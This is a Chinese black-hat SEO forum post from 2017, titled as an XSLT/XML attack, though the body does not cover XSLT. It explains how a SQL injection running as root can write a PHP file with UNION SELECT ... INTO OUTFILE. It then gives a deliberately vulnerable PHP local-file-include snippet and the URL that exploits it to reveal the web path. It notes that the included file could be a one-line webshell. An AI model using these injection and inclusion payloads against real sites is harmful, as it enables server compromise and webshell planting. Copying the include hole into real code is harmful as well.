黑帽SEO技术论坛|商业源码|棋牌资源网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月
文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月
查看: 53|回复: 0

利用XSLT继续击垮XML

[复制链接]

1674

主题

1690

帖子

8700

积分

超级版主

Rank: 18Rank: 18Rank: 18Rank: 18Rank: 18

积分
8700
发表于 2017-3-5 08:48:31 | 显示全部楼层 |阅读模式
本帖最后由 甩葱哥 于 2017-3-5 14:02 编辑

利用XSLT继续击垮XML
1-14021Q5092E05.jpg

首先假设我们的网站存在SQL注入漏洞与一个本地包含漏洞!

那么PHP.INI里的magic_quotes_gpc = off


我们重注射点判断出为ROOT权限!
www.lxxx.com/index.php?id=2 union select 1,2,3,4,这里写<? phpinfo(); ?> 十六进制转换,5,6 into outfile 'D:\\duyun\\1.php';
这样1.php 内容就是<? phpinfo(); ?>咯!下面是包含漏洞的代码!保存为index.php~大家不用跟着我做~我只是假设而已

  • <?php
  • $fuck = $_GET["fuck"];  
  • if ($fuck) {  
  • include $_GET["fuck"];  
  • }  
  • ?>


下面浏览器输入www.lxxx.com/index.php?fuck=D:\duyun\1.php


这样就能查看到WEB绝度路径咯
补充一点,包含的文件可以是一句话木马等等..



回复

使用道具 举报

*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|黑帽SEO技术论坛|商业源码|棋牌资源网  |网站地图

Powered by Discuz! X3.3© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表